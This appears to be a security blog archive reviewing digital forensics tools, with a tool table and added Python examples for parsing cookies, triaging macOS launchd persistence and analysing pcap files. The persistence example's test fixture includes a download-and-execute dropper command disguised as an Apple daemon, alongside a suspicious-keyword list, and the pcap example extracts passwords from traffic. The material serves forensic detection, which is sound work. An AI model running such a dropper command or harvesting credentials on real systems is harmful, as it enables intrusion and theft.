Forensics Investigation of Ping Command
Reviewed by 0x000216 on Monday, January 27, 2020
srum-dump – A Forensics Tool to Convert the Data in the Windows srum
Reviewed by 0x000216 on Wednesday, January 01, 2020
awesome-forensics
Reviewed by 0x000216 on Wednesday, January 01, 2020
Learn Network Forensics - Absolutely great list of resources, training, etc. - FREE
Reviewed by 0x000216 on Friday, February 01, 2019
AboutDFIR.com – The Definitive Compendium Project Digital Forensics & Incident Response
Reviewed by 0x000216 on Monday, January 21, 2019
Let Me Pick Your Brain - Remote Forensics in Hardened Environments
Reviewed by 0x000216 on Saturday, June 30, 2018
Forensics
"As a result, technologies that make rapid search and analysis of evidence on 'live' systems easier began to flourish over the last decade and formed the basis of what is known as the endpoint detection and response market," he said. EDR products typically offer some combination of the following capabilities:
Continuous recording of key telemetry, such as executed processes or network connections, to provide a readily available timeline of activity on a system. This is analogous to an aircraft's black-box recorder, he said. Access to this telemetry removes the need to reconstruct historical events from a system's native sources of evidence. It can be less useful where the investigative technology is deployed in an environment after a breach has already occurred.
Analysis and search of a system's forensic sources of evidence, that is, what the operating system preserves on its own during normal operation. This includes the ability to run fast, targeted searches for files, processes, log entries, artifacts in memory and other evidence across systems at scale. It complements a continuous event recorder and can be used to widen the scope of an investigation and find additional leads that might otherwise not have been preserved.
Alerting and detection. Products can proactively collect and analyze the data sources above and compare them against structured threat intelligence (such as Indicators of Compromise), rules or other heuristics intended to detect malicious activity.
Evidence collection from individual hosts. As investigators identify systems that need closer inspection, they can conduct "deep dive" collection and analysis across the whole of a subject system's historical telemetry (if present and recorded), its files on disk and its memory. Most organizations prefer remote analysis and triage of live systems over comprehensive forensic imaging whenever possible, he said.
http://www.itworld.com/article/3192348/security/computer-forensics-follows-the-bread-crumbs-left-by-perpetrators.html
Reviewed by 0x000216 on Monday, May 08, 2017
OWASP iOSForensic - Tool to help in forensics analysis on iOS
OWASP iOSForensic is a Python tool to help with forensic analysis on iOS.
It retrieves files and logs, extracts SQLite3 databases and converts binary .plist files to XML. It talks to the device over SSH, so the target has to be jailbroken with an SSH server installed.
OWASP iOSForensic provides:
- Application files
- Conversion of .plist files to XML
- Extraction of all databases
- Conversion of binary cookies
- Application logs
- A list of all packages
- Extraction of multiple packages
Options
- -h --help : show help message
- -a --about : show information about the tool
- -v --verbose : verbose mode
- -i --ip : local IP address of the iOS device
- -p --port : SSH port of the iOS device (default 22)
- -P --password : root password of the iOS device (default alpine, the factory root password of iOS)
Examples:
./iOSForensic.py -i 192.168.1.10 [OPTIONS] APP_NAME.app INCOMPLETE_APP_NAME APP_NAME2_WITHOUT_DOT_APP
./iOSForensic.py -i 192.168.1.10 -p 1337 -P pwd MyApp.app angry MyApp2
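The post lists "conversion of binary cookies" as a feature without saying what the format is. The parser below is an added example, not code from OWASP iOSForensic: it reads Safari's Cookies.binarycookies layout as documented by existing open-source readers (a big-endian page table, little-endian cookie records, Mac-absolute-time doubles, flag bits 1 = Secure and 4 = HttpOnly) and reports every cookie with its flags and timestamps. build_sample() constructs a small file in that layout so the script runs offline; the cookie values in it are made up.

```python
"""Parse Safari/iOS Cookies.binarycookies files (added example, not OWASP iOSForensic code)."""
import struct
from datetime import datetime, timedelta, timezone

# Cookie timestamps are seconds since the Mac absolute epoch, 2001-01-01 00:00:00 UTC.
MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)
FLAG_NAMES = {1: "Secure", 4: "HttpOnly"}  # bit values used by community readers


def _cstring(buf, off):
    """NUL-terminated UTF-8 string starting at offset 'off'."""
    return buf[off:buf.index(b"\x00", off)].decode("utf-8", "replace")


def parse_binarycookies(data):
    """Return a list of cookie dicts from the raw bytes of a binarycookies file."""
    if data[:4] != b"cook":
        raise ValueError("not a binarycookies file (bad magic)")
    num_pages = struct.unpack(">I", data[4:8])[0]              # page table is big-endian
    page_sizes = struct.unpack(">%dI" % num_pages, data[8:8 + 4 * num_pages])
    cookies, pos = [], 8 + 4 * num_pages
    for size in page_sizes:
        page, pos = data[pos:pos + size], pos + size
        if page[:4] != b"\x00\x00\x01\x00":
            raise ValueError("bad page header")
        num_cookies = struct.unpack("<I", page[4:8])[0]         # page contents are little-endian
        offsets = struct.unpack("<%dI" % num_cookies, page[8:8 + 4 * num_cookies])
        for off in offsets:
            c = page[off:]
            # size, unknown, flags, unknown, then url/name/path/value offsets (relative to cookie start)
            _size, _, flags, _, url_o, name_o, path_o, val_o = struct.unpack("<8I", c[:32])
            expiry, created = struct.unpack("<dd", c[40:56])   # after 8 zero bytes: two doubles
            cookies.append({
                "domain": _cstring(c, url_o), "name": _cstring(c, name_o),
                "path": _cstring(c, path_o), "value": _cstring(c, val_o),
                "flags": [n for bit, n in FLAG_NAMES.items() if flags & bit],
                "created": MAC_EPOCH + timedelta(seconds=created),
                "expires": MAC_EPOCH + timedelta(seconds=expiry),
            })
    return cookies


def _encode_cookie(domain, name, path, value, flags, created, expires):
    """Inverse of the record layout above, used only to build the constructed sample."""
    strings = [s.encode() + b"\x00" for s in (domain, name, path, value)]
    offsets, cur = [], 56  # 32-byte header + 8 zero bytes + two 8-byte doubles
    for s in strings:
        offsets.append(cur)
        cur += len(s)
    header = struct.pack("<8I", cur, 0, flags, 0, *offsets)
    return header + b"\x00" * 8 + struct.pack("<dd", expires, created) + b"".join(strings)


def build_sample():
    """Constructed one-page binarycookies file: a Secure+HttpOnly session cookie and a tracker."""
    cks = [_encode_cookie("example.com", "session", "/", "abc123", 5, 600000000.0, 631152000.0),
           _encode_cookie(".tracker.example", "uid", "/", "42", 0, 600000000.0, 700000000.0)]
    offsets, cur = [], 4 + 4 + 4 * len(cks) + 4          # header, count, offset table, footer
    for c in cks:
        offsets.append(cur)
        cur += len(c)
    page = (b"\x00\x00\x01\x00" + struct.pack("<I", len(cks))
            + struct.pack("<%dI" % len(cks), *offsets) + b"\x00\x00\x00\x00" + b"".join(cks))
    return b"cook" + struct.pack(">I", 1) + struct.pack(">I", len(page)) + page


if __name__ == "__main__":
    for ck in parse_binarycookies(build_sample()):
        print(ck["domain"], ck["name"], ck["value"], ck["flags"], ck["expires"].isoformat())
```

Run it against a real file with parse_binarycookies(open(path, "rb").read()); the expiry and creation times are what you want when tying a cookie to a session in the timeline.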
Reviewed by 0x000216 on Wednesday, July 02, 2014
Collection Of Free Computer Forensic Tools
Disk tools and data capture
Tool | Vendor/Author | Description |
---|---|---|
DumpIt | MoonSols | Generates a physical memory dump of Windows machines, 32-bit and 64-bit. Can run from a USB flash drive. |
EnCase Forensic Imager | Guidance Software | Create EnCase evidence files and EnCase logical evidence files |
Encrypted Disk Detector* | Magnet Forensics | Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes |
EWF MetaEditor | 4Discovery | Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier) |
FAT32 Format | Ridgecrop | Enables large capacity disks to be formatted as FAT32 |
Forensics Acquisition of Websites | Web Content Protection Association | Browser designed to forensically capture web pages |
FTK Imager* | AccessData | Imaging tool, disk viewer and image mounter |
Guymager | vogu00 | Multi-threaded GUI imager running under Linux |
HotSwap | Kazuyuki Nakayama | Safely remove SATA disks similar to the “Safely Remove Hardware” icon in the notification area |
LiveView | CERT | Allows examiner to boot dd images in VMware. |
P2 Explorer Free | Paraben | Mount forensic images as read-only local logical and physical disks |
Live RAM Capturer* | Belkasoft | Extracts a RAM dump, including memory protected by an anti-debugging or anti-dumping system. 32-bit and 64-bit builds |
OSFClone | Passmark Software | Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones. |
OSFMount | Passmark Software | Mounts a wide range of disk images. Also allows creation of RAM disks |
Tableau Imager* | Tableau | Imaging tool for use with Tableau imaging products |
VHD Tool | Microsoft | Converts raw disk images to VHD format which are mountable in Windows Disk Management |
Email analysis
Tool | Vendor/Author | Description |
---|---|---|
EDB Viewer | Lepide Software | Open and view (not export) Outlook EDB files without an Exchange server |
Mail Viewer | MiTeC | Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files |
OST Viewer | Lepide Software | Open and view (not export) Outlook OST files without connecting to an Exchange server |
PST Viewer | Lepide Software | Open and view (not export) Outlook PST files without needing Outlook |
General
Tool | Vendor/Author | Description |
---|---|---|
Agent Ransack | Mythicsoft | Search multiple files using Boolean operators and Perl Regex |
CaseNotes Lite | Blackthorn | Contemporaneous notes recorder |
Computer Forensic Reference Data Sets | NIST | Collated forensic images for training, practice and validation |
EvidenceMover* | Nuix | Copies data between locations, with file comparison, verification, logging |
FastCopy | Shirouzu Hiroaki | Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc. |
File Signatures | Gary Kessler | Table of file signatures |
HashMyFiles | Nirsoft | Calculate MD5 and SHA1 hashes |
MobaLiveCD | Mobatek | Run Linux live CDs from their ISO image without having to boot to them |
Mouse Jiggler | Arkane Systems | Automatically moves mouse pointer stopping screen saver, hibernation etc. |
Notepad ++ | Notepad ++ | Advanced Notepad replacement |
NSRL | NIST | Hash sets of ‘known’ (ignorable) files |
Quick Hash | Ted Technology | A Linux & Windows GUI for individual and recursive SHA1 hashing of files |
USB Write Blocker | DSi | Enables software write-blocking of USB ports |
USB Write Blocker | Sécurité Multi-Secteurs | Software write blocker for Windows XP through to Windows 8 |
Windows Forensic Environment | Troy Larson | Guide by Brett Shavers to creating and working with a Windows boot CD |
File and data analysis
Tool | Vendor/Author | Description |
---|---|---|
Advanced Prefetch Analyser | Allan Hay | Reads Windows XP,Vista and Windows 7 prefetch files |
analyzeMFT | David Kovar | Parses the MFT from an NTFS file system allowing results to be analysed with other tools |
Defraser | Various | Detects full and partial multimedia files in unallocated space |
eCryptfs Parser | Ted Technology | Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc. |
Encryption Analyzer | Passware | Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file |
ExifTool | Phil Harvey | Read, write and edit Exif data in a large number of file types |
Forensic Image Viewer | Sanderson Forensics | View various picture formats, image enhancer, extraction of embedded Exif, GPS data |
Highlighter | Mandiant | Examine log files using text, graphic or histogram views |
Link Parser | 4Discovery | Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files |
LiveContactsView | Nirsoft | View and export Windows Live Messenger contact details |
RSA Netwitness Investigator* | EMC | Network packet capture and analysis |
Memoryze | Mandiant | Acquire and/or analyse RAM images, including the page file on live systems |
MetaExtractor | 4Discovery | Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files |
MFTview | Sanderson Forensics | Displays and decodes contents of an extracted MFT file |
NetSleuth | NetGrab | Network monitoring tool, with covert “silent port scanning” |
PictureBox | Mike’s Forensic Tools | Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format |
PsTools | Microsoft | Suite of command-line Windows utilities |
Shadow Explorer | Shadow Explorer | Browse and extract files from shadow copies |
Simple File Parser | Chris Mayhew | GUI tool for parsing .lnk files, prefetch and jump list artefacts |
SQLite Manager | Mrinal Kant, Tarakant Tripathy | Firefox add-on enabling viewing of any SQLite database |
Strings | Microsoft | Command-line tool for text searches |
Structured Storage Viewer | MiTec | View and manage MS OLE Structured Storage based files |
Switch-a-Roo | Mike’s Forensic Tools | Text replacement/converter/decoder for when dealing with URL encoding, etc |
Windows File Analyzer | MiTeC | Analyse thumbs.db, Prefetch, INFO2 and .lnk files |
Mac OS tools
Tool | Vendor/Author | Description |
---|---|---|
Audit | Twocanoes Software | Audit Preference Pane and Log Reader for OS X |
Disk Arbitrator | Aaron Burghardt | Blocks the mounting of file systems, complementing a write blocker by disabling disk arbitration |
Epoch Converter* | Blackbag Technologies | Converts epoch times to local time and UTC |
FTK Imager CLI for Mac OS* | AccessData | Command line Mac OS version of AccessData’s FTK Imager |
IORegInfo | Blackbag Technologies | Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected |
Mac Memory Reader | Cyber Marshal | Command-line utility to capture physical RAM from Mac OS systems |
PMAP Info* | Blackbag Technologies | Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors |
Mobile devices
Tool | Vendor/Author | Description |
---|---|---|
iPhone Analyzer | Leo Crawford, Mat Proud | Explore the internal file structure of iPads, iPods and iPhones |
ivMeta | Robin Wood | Extracts phone model and software version and created date and GPS data from iPhone videos. |
Rubus* | CCL Forensics | Deconstructs Blackberry .ipd backup files |
SAFT | SignalSEC Corp | Obtain SMS Messages, call logs and contacts from Android devices |
WhatsApp Forensics | Zena Forensics | Extract WhatsApp messages from iOS and Android backups |
Data analysis suites
Tool | Vendor/Author | Description |
---|---|---|
Autopsy | Brian Carrier | Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below) |
Backtrack | Backtrack | Penetration testing and security audit with forensic boot capability |
Caine | Nanni Bassetti | Linux based live CD, featuring a number of analysis tools |
Deft | Dr. Stefano Fratepietro and others | Linux based live CD, featuring a number of analysis tools |
Digital Forensics Framework | ArxSys | Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items |
Forensic Scanner | Harlan Carvey | Automates 'repetitive tasks of data collection' |
Paladin* | Sumuri | Ubuntu based live boot CD for imaging and analysis |
SIFT* | SANS | VMware Appliance pre-configured with multiple tools allowing digital forensic examinations |
The Sleuth Kit | Brian Carrier | Collection of UNIX-based command line file and volume system forensic analysis tools |
Ubuntu guide | How-To Geek | Guide to using an Ubuntu live disk to recover partitions, carve files, etc. |
Volatility Framework | Volatile Systems | Collection of tools for the extraction of artefacts from RAM |
File viewers
Tool | Vendor/Author | Description |
---|---|---|
Microsoft PowerPoint 2007 Viewer | Microsoft | View PowerPoint presentations |
Microsoft Visio 2010 Viewer | Microsoft | View Visio diagrams |
VLC | VideoLAN | View most multimedia files and DVD, Audio CD, VCD, etc. |
Internet analysis
Tool | Vendor/Author | Description |
---|---|---|
Chrome Session Parser | CCL Forensics | Python module for performing off-line parsing of Chrome session files (“Current Session”, “Last Session”, “Current Tabs”, “Last Tabs”) |
ChromeCacheView | Nirsoft | Reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache |
Cookie Cutter | Mike’s Forensic Tools | Extracts embedded data held within Google Analytics cookies. Shows search terms used as well as dates of and the number of visits. |
Dumpzilla | Busindre | Runs in Python 3.x, extracting forensic information from Firefox, Iceweasel and Seamonkey browsers. See manual for more information. |
Facebook Profile Saver | Belkasoft | Captures information publicly available in Facebook profiles. |
IECookiesView | Nirsoft | Extracts various details of Internet Explorer cookies |
IEPassView | Nirsoft | Extract stored passwords from Internet Explorer versions 4 to 8 |
MozillaCacheView | Nirsoft | Reads the cache folder of Firefox/Mozilla/Netscape Web browsers |
MozillaCookieView | Nirsoft | Parses the cookie folder of Firefox/Mozilla/Netscape Web browsers |
MozillaHistoryView | Nirsoft | Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web page |
MyLastSearch | Nirsoft | Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace) |
PasswordFox | Nirsoft | Extracts the user names and passwords stored by Mozilla Firefox Web browser |
OperaCacheView | Nirsoft | Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache |
OperaPassView | Nirsoft | Decrypts the content of the Opera Web browser password file, wand.dat |
Web Historian | Mandiant | Reviews list of URLs stored in the history files of the most commonly used browsers |
Web Page Saver* | Magnet Forensics | Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages |
Registry analysis
Tool | Vendor/Author | Description |
---|---|---|
ForensicUserInfo | Woanware | Extracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file |
Process Monitor | Microsoft | Examine Windows processes and registry threads in real time |
Registry Decoder | US National Institute of Justice, Digital Forensics Solutions | For the acquisition, analysis, and reporting of registry contents |
RegRipper | Harlan Carvey | Registry data extraction and correlation tool |
Regshot | Regshot | Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software |
sbag | TZWorks | Extracts data from Shellbag entries |
USB Device Forensics | Woanware | Details previously attached USB devices on exported registry hives |
USB Historian | 4Discovery | Displays 20+ attributes relating to USB device use on Windows systems |
USBDeview | Nirsoft | Details previously attached USB devices |
User Assist Analysis | 4Discovery | Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys |
UserAssist | Didier Stevens | Displays list of programs run, with run count and last run date and time |
Windows Registry Recovery | MiTec | Extracts configuration settings and other information from the Registry |
Application analysis
Tool | Vendor/Author | Description |
---|---|---|
Dropbox Decryptor* | Magnet Forensics | Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox |
Google Maps Tile Investigator* | Magnet Forensics | Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context |
KaZAlyser | Sanderson Forensics | Extracts various data from the KaZaA application |
LiveContactsView | Nirsoft | View and export Windows Live Messenger contact details |
SkypeLogView | Nirsoft | View Skype calls and chats |
Abandonware
Tool | Vendor/Author | Description |
---|---|---|
DCode | Digital Detective | Converts various data types to date/time values |
iPhone Backup Browser | Rene Devichi | View unencrypted backups of iPad, iPod and iPhones |
ChromeAnalysis | Foxton Software | Analysis of internet history data generated using Google Chrome |
IEHistoryView | Nirsoft | Extracts recently visited Internet Explorer URLs |
Reviewed by 0x000216 on Tuesday, February 04, 2014
[OS X Auditor] free Mac OS X computer forensics tool
OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:
- the kernel extensions
- the system agents and daemons
- the third-party agents and daemons
- the old and deprecated system and third-party startup items
- the users' agents
- the users' downloaded files
- the installed applications
It extracts:
- the users' quarantined files
- the users' Safari history, downloads, topsites, HTML5 databases and localstore
- the users' Firefox cookies, downloads, formhistory, permissions, places and signons
- the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
- the users' social and email accounts
- the WiFi access points the audited system has been connected to (and tries to geolocate them)
It also looks for suspicious keywords in the .plist themselves.
It can verify the reputation of each file on:
- Team Cymru's MHR
- VirusTotal
- Malware.lu
- your own local database
It can aggregate all logs from the following directories into a zipball:
- /var/log (-> /private/var/log)
- /Library/logs
- the user's ~/Library/logs
Finally, the results can be:
- rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep)
- rendered as a HTML log file
- sent to a Syslog server
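The list above is what OS X Auditor does; the script below shows the core of it in working code. It is an added example, not code from OS X Auditor: it walks the standard launchd persistence directories under a configurable root (so a mounted copy of a system can be analysed instead of the live one, as the post describes), parses each plist, hashes the program it points at, derives the DNS name for a Team Cymru MHR lookup from the SHA-1, and flags suspicious keywords. The keyword list is an assumption of this example, not the tool's, and the plists and binary it analyses are constructed in a temporary directory.

```python
"""Triage macOS launchd persistence plists (added example, not OS X Auditor code)."""
import hashlib
import os
import plistlib
import tempfile

# Assumed keyword list for this example; OS X Auditor ships its own, not reproduced here.
SUSPICIOUS_KEYWORDS = ("curl", "wget", "/tmp/", "python -c", "base64", "osascript", "chmod +x")
PERSISTENCE_DIRS = ("Library/LaunchAgents", "Library/LaunchDaemons",
                    "System/Library/LaunchAgents", "System/Library/LaunchDaemons")


def hash_file(path):
    """md5/sha1/sha256 of a file in one pass; Team Cymru's MHR indexes MD5 and SHA-1."""
    hs = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            for h in hs.values():
                h.update(chunk)
    return {k: h.hexdigest() for k, h in hs.items()}


def mhr_query_name(digest):
    """DNS name whose TXT record Team Cymru's Malware Hash Registry answers for a hash."""
    return "%s.malware.hash.cymru.com" % digest.lower()


def triage_plist(path, root="/"):
    """Parse one launchd plist; 'root' may be a mounted copy of the system instead of /."""
    with open(path, "rb") as f:
        raw = f.read()
    try:
        plist = plistlib.loads(raw)
    except Exception as exc:  # a plist that will not parse is itself a finding
        return {"plist": path, "error": str(exc)}
    args = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
    cmdline, text = " ".join(args), raw.decode("utf-8", "replace")
    rec = {"plist": path, "label": plist.get("Label"), "program": args[0] if args else None,
           "cmdline": cmdline, "run_at_load": bool(plist.get("RunAtLoad", False)),
           "keywords": [k for k in SUSPICIOUS_KEYWORDS if k in cmdline or k in text],
           "hashes": None, "mhr_query": None}
    if rec["program"]:
        target = os.path.join(root, rec["program"].lstrip("/"))
        if os.path.isfile(target):  # absent under an image root is worth reporting too
            rec["hashes"] = hash_file(target)
            rec["mhr_query"] = mhr_query_name(rec["hashes"]["sha1"])
    return rec


def triage_persistence(root="/"):
    """Triage every plist in the standard launchd directories below 'root'."""
    results = []
    for d in PERSISTENCE_DIRS:
        full = os.path.join(root, d)
        if os.path.isdir(full):
            for name in sorted(os.listdir(full)):
                if name.endswith(".plist"):
                    results.append(triage_plist(os.path.join(full, name), root))
    return results


def _write_plist(path, obj):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        plistlib.dump(obj, f)


def build_sample_root():
    """Constructed 'system copy': one benign agent and one dropper-style daemon."""
    root = tempfile.mkdtemp(prefix="osx-triage-")
    os.makedirs(os.path.join(root, "usr/bin"))
    with open(os.path.join(root, "usr/bin/updater"), "wb") as f:
        f.write(b"#!/bin/sh\necho benign\n")
    _write_plist(os.path.join(root, "Library/LaunchAgents/com.vendor.updater.plist"),
                 {"Label": "com.vendor.updater", "RunAtLoad": True,
                  "ProgramArguments": ["/usr/bin/updater", "--check"]})
    _write_plist(os.path.join(root, "Library/LaunchDaemons/com.apple.system.update.plist"),
                 {"Label": "com.apple.system.update", "RunAtLoad": True, "KeepAlive": True,
                  "ProgramArguments": ["/bin/sh", "-c",
                                       "curl -s http://198.51.100.7/p | base64 -d > /tmp/.x; sh /tmp/.x"]})
    return root


if __name__ == "__main__":
    for r in triage_persistence(build_sample_root()):
        print(r["label"], "|", r["cmdline"], "| keywords:", r["keywords"], "| sha256:",
              r["hashes"]["sha256"] if r["hashes"] else "target not found under root")
```

Note the second sample: an Apple-looking label in /Library/LaunchDaemons whose program is /bin/sh with a download-and-execute one-liner. Hashing /bin/sh tells you nothing in that case; the command line and keywords are the evidence, which is why the record keeps both.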
Reviewed by 0x000216 on Monday, September 16, 2013
[NetworkMiner v1.4.1] Network Forensic Analysis Tool (NFAT)
NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD).
NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.
NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.
A professional edition of NetworkMiner is available for purchase from NETRESEC
The free edition is available here: NetworkMiner_1-4-1.zip.
NetworkMiner collects data (such as forensic evidence) about the hosts on the network rather than about the traffic itself. The main user interface view is host-centric (information grouped per host) rather than packet-centric (information shown as a list of packets/frames).
NetworkMiner can extract files and certificates transferred over the network by parsing a PCAP file or by sniffing traffic directly from the network. This functionality can be used to extract and save media files (such as audio or video files) which are streamed across a network from websites such as YouTube. Supported protocols for file extraction are FTP, TFTP, HTTP and SMB.
User credentials (usernames and passwords) for supported protocols are extracted by NetworkMiner and displayed under the "Credentials" tab. The Credentials tab sometimes also shows information that can be used to identify a particular person, such as user accounts for popular online services like Gmail or Facebook.
Another very useful feature is that the user can search sniffed or stored data for keywords. NetworkMiner allows the user to insert arbitrary string or byte-patterns that shall be searched for with the keyword search functionality.
Reviewed by 0x000216 on Wednesday, February 20, 2013
NetSleuth : Open source Network Forensics And Analysis Tools
NetSleuth identifies and fingerprints network devices by silent network monitoring or by processing data from PCAP files.
NetSleuth is an open-source network forensics and analysis tool designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or Wi-Fi (from tools like Kismet).
It also includes a live mode that silently identifies hosts and devices without sending any packets or putting the network adapters into promiscuous mode ("silent portscanning").
NetSleuth is a free network monitoring, cyber security and network forensics analysis (NFAT) tool that provides the following features:
An easy realtime overview of what devices and what people are connected to any WiFi or Ethernet network.
Free. The tool can be downloaded for free, and the source code is available under the GPL.
Simple and cost effective. No requirement for hardware or reconfiguration of networks.
“Silent portscanning” and undetectable network monitoring on WiFi and wired networks.
Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.
Offline analysis of pcap files, from tools like Kismet or tcpdump, to aid in intrusion response and network forensics.
Requirements
A full installation of Wireshark on your machine; specifically, NetSleuth needs the tshark program (installed by default with Wireshark).
The current version of NetSleuth is 1.61.
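Both the NetworkMiner post and the NetSleuth post above describe the same passive approach: read frames from a pcap (or the wire) and build a host-centric picture rather than a packet list, pulling credentials out along the way. The script below is an added example, not code from either tool, showing that approach end to end: it parses a classic libpcap file by hand (Ethernet/IPv4/TCP only), records per host its MAC, a TTL-based OS hint, the ports it has answered SYN-ACK on and the peers it talked to, and extracts HTTP Basic credentials from payloads. The TTL-to-OS mapping is a rough heuristic assumed here, and the capture is constructed by build_sample_pcap() so it runs offline.

```python
"""Passive, host-centric PCAP analysis with HTTP Basic credential extraction
(added example, not NetworkMiner or NetSleuth code)."""
import base64
import struct
from collections import defaultdict

ETH_IPV4, PROTO_TCP = 0x0800, 6


def iter_pcap_packets(data):
    """Yield (timestamp, frame) from a classic libpcap file of either byte order."""
    end = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(data[:4])
    if end is None:
        raise ValueError("not a classic libpcap file")
    pos = 24  # skip the 24-byte global header
    while pos + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _ = struct.unpack(end + "IIII", data[pos:pos + 16])
        pos += 16
        yield ts_sec + ts_usec / 1e6, data[pos:pos + incl_len]
        pos += incl_len


def decode_frame(frame):
    """Ethernet/IPv4/TCP fields of one frame, or None for anything else."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_IPV4:
        return None
    ip = frame[14:14 + struct.unpack("!H", frame[16:18])[0]]  # drop Ethernet padding
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != PROTO_TCP:
        return None
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    return {"src_mac": frame[6:12].hex(":"), "src": ".".join(map(str, ip[12:16])),
            "dst": ".".join(map(str, ip[16:20])), "ttl": ip[8], "sport": sport,
            "dport": dport, "flags": tcp[13], "payload": tcp[(tcp[12] >> 4) * 4:]}


def ttl_os_hint(ttl):
    """Rough initial-TTL class (heuristic assumed for this example, not a fingerprint)."""
    if ttl <= 64:
        return "initial TTL 64 (Linux/macOS-like)"
    if ttl <= 128:
        return "initial TTL 128 (Windows-like)"
    return "initial TTL 255 (network gear/BSD-like)"


def analyse(pcap_bytes):
    """Return (hosts, credentials): per-host inventory and HTTP Basic logins observed."""
    hosts = defaultdict(lambda: {"mac": None, "ttl": None, "open_ports": set(), "talks_to": set()})
    creds = []
    for ts, frame in iter_pcap_packets(pcap_bytes):
        pkt = decode_frame(frame)
        if pkt is None:
            continue
        h = hosts[pkt["src"]]
        h["mac"], h["ttl"] = pkt["src_mac"], pkt["ttl"]
        if pkt["flags"] & 0x12 == 0x12:  # SYN+ACK: the sender really listens on sport
            h["open_ports"].add(pkt["sport"])
        h["talks_to"].add((pkt["dst"], pkt["dport"]))
        for line in pkt["payload"].split(b"\r\n"):
            if line.lower().startswith(b"authorization: basic "):
                try:
                    user, _, pw = base64.b64decode(line.split()[2]).decode("latin-1").partition(":")
                except Exception:
                    continue  # malformed header, not a credential
                creds.append({"ts": ts, "client": pkt["src"], "server": pkt["dst"],
                              "port": pkt["dport"], "user": user, "password": pw})
    return {ip: dict(h, os_hint=ttl_os_hint(h["ttl"])) for ip, h in hosts.items()}, creds


def _frame(src_mac, dst_mac, src, dst, sport, dport, flags, ttl, payload=b""):
    """Build one Ethernet/IPv4/TCP frame for the sample (checksums left zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, ttl, PROTO_TCP, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    eth = bytes.fromhex(dst_mac.replace(":", "") + src_mac.replace(":", "")) + struct.pack("!H", ETH_IPV4)
    return eth + ip + tcp


def build_sample_pcap():
    """Constructed capture: a Windows-like client logs in to an intranet HTTP server."""
    c, s, cmac, smac = "10.0.0.5", "10.0.0.80", "02:00:00:00:00:05", "02:00:00:00:00:80"
    req = (b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
           + base64.b64encode(b"alice:Winter2024!") + b"\r\n\r\n")
    frames = [_frame(cmac, smac, c, s, 51000, 80, 0x02, 128),       # SYN
              _frame(smac, cmac, s, c, 80, 51000, 0x12, 64),        # SYN-ACK
              _frame(cmac, smac, c, s, 51000, 80, 0x10, 128),       # ACK
              _frame(cmac, smac, c, s, 51000, 80, 0x18, 128, req)]  # PSH-ACK with the request
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # little-endian global header
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    hosts, creds = analyse(build_sample_pcap())
    for ip, h in sorted(hosts.items()):
        print(ip, h["mac"], h["os_hint"], "listening on", sorted(h["open_ports"]))
    for cred in creds:
        print("credential:", cred["client"], "->", cred["server"], cred["user"], cred["password"])
```

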